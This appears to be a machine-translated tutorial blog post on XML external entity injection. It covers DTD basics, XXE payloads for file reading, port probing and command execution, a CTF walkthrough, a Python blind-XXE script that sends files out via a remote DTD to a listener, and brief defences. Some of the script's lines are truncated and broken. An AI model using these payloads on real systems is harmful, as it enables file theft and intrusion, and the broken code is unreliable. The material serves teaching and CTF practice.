Xml external entity injection vulnerability

Posted by swasheck on Sun, 06 Feb 2022 07:54:16 +0100

Xml external entity injection vulnerability (XXE)

Xml introduction

  • XML is not a substitute for HTML.

  • XML and HTML are designed for different purposes:

  • XML is designed to transmit and store data, and its focus is the content of the data.

  • HTML is designed to display data, focusing on the appearance of the data.

  • HTML is designed to display information, while XML is designed to transmit information.

XML document structure includes: XML document declaration, DTD document type definition, document element Libxml is an XML document interpreter, libxml2 After 9.0, external entities are not parsed by default, resulting in the gradual disappearance of XXE vulnerability

<?xml version="1.0"?>   # xml declaration

<!DOCTYPE note SYSTEM "note.dtd">   # DTD document type definition

<from>John</from>                     # Document element
<body>Don't forget the meeting!</body>

Internal declaration DTD

<!DOCTYPE Root element [Element declaration]]>

Entities can be understood as defining variables, and entities can be declared internally or externally. Internal declaration is similar to directly defining variables, and external declaration entities are similar to introducing the contents of external files as the values of variables.

Internal declaration entity

  • <!ENTITY Entity name "Value of entity">
  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note [
      <!ENTITY writer "Bill Gates">
    <!ENTITY copyright "Copyright W3School.com.cn">

External declaration entity

  • <!ENTITY Entity name SYSTEM "URI/URL">
  • Support http, https, file and many other protocols

  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note [
    <!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
    <!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

External declaration DTD

  • External declaration DTD is a DTD file directly imported from the outside. It should be clearly distinguished from external declaration entities

  • <!DOCTYPE Root element SYSTEM "file name">
  • Examples

    <?xml version="1.0"?>
    <!DOCTYPE note SYSTEM "note.dtd">
    <body>Don't forget the meeting!</body>

Vulnerability hazard

  1. Read any file from the server (File Protocol import)

    <!ENTITY writer SYSTEM "file:///flag">
  2. Probe intranet port

    <?xml version="1.0"?>
    <!DOCTYPE user [
    <!ENTITY writer SYSTEM "http:/ip:port/xxx">

    In php, you can use simplexml_ load_ The echo of string function error can judge the opening of the port through the response time (if the target system does not process it)

  3. Execute system commands (certain conditions are required, and different languages execute in different ways)

    install expect Extended PHP System commands can also be executed directly in the environment
     implement ifconfig command
    <?xml version="1.0"?>
    <!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY XXE SYSTEM "expect://ifconfig" >]>
  4. Attack intranet websites (vulnerabilities in other intranet websites are required)

Buuctf ctf title

[NCTF2019]Fake XML cookbook

Try to log in and capture packets through burpsuit

Accept: application/xml, text/xml, /; q=0.01
X-Requested-With: XMLHttpRequest
Moreover, the content submitted by post is in xml format -------- > there may be an xml external entity injection vulnerability

Tentative injection

<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY writer "test">

It is found that the test injection is successful -------- it is judged that there is a vulnerability -------- > because it is a ctf problem, we need to get the flag -------- > read the local flag file

The file path read here is / flag (because many ctf questions will put the flag here)

python detection xxe

xxe with echo is very convenient to judge (such as the above ctf question), but it is a little cumbersome to judge xxe without echo. Use python source code for security detection

from http.server import HTTPServer,SimpleHTTPRequestHandler
import threading
import requests
import sys

# Native log_ The message function is rewritten to save the result to a file while outputting the result
class MyHandler(SimpleHTTPRequestHandler):
    def log_message(self, format, *args):
        # The terminal outputs HTTP access information
        sys.stderr.write("%s - - [%s] %s\n" %
        # Save information to file
        textFile = open("result.txt", "a")
        textFile.write("%s - - [%s] %s\n" %

# Open HTTP service and receive data
def StartHTTP(lip,lport):
    # IP address and port of HTTP listening
    serverAddr = (lip, lport)
    httpd = HTTPServer(serverAddr, MyHandler)
    print("[*] Opening HTTP The server:\n\n================\nIP address:{0}\n port:{1}\n================\n".format(lip, lport))

# Create attack code file
def ExportPayload(lip,lport):
    file = open('evil.xml','w')
    file.write("<!ENTITY % payload \"<!ENTITY &#x25; send SYSTEM 'http://{0}:{1}/?content=%file;'>\"> %payload;".format(lip, lport))
    print("[*] Payload File created successfully!")

#Send attack data through POST
def SendData(lip, lport, url):
    # Path of the file to be read (default)
    filePath = "c:\\test.txt"
    while True:
        # Replacement of slash in file path of user input
        filePath = filePath.replace('\\', "/")
        data = "<?xml version=\"1.0\"?>\n<!DOCTYPE test[\n<!ENTITY % file SYSTEM \"php://filter/read=convert.base64-encode/resource={0}\">\n<!ENTITY % dtd SYSTEM \"http://{1}:{2}/evil.xml\">\n%dtd;\n%send;\n]>".format(filePath, lip, lport)
        requests.post(url, data=data)
        # Continue to receive user input and read the specified file
        filePath = input("Input filePath:")

if __name__ == '__main__':
    #Native IP
    lip = ""
    #Native HTTP listening port
    lport = 3344
    #URL of the form submitted by the target site
    url = ""
    # Create a payload file
    ExportPayload(lip, lport)
    # HTTP service thread
    threadHTTP = threading.Thread(target=StartHTTP,args=(lip, lport))
    # Send POST data thread
    threadPOST = threading.Thread(target=SendData,args=(lip, lport, url))

The shooting range can choose xxE lab
Dologin. In xxE lab PHP does the following

  • Comment out echo $result in the last line;
  • Add errer_report(0);

In this way, no output and no error will be reported, which becomes an echo free xxe vulnerability

Defense strategy

  1. Resolution of external entities is prohibited by default
  2. Filter the XML data submitted by users, such as keyword <! DOCTYPE and <! Entity or SYSTEM and PUBLIC.
  3. Disable related functions in the programming language corresponding to the website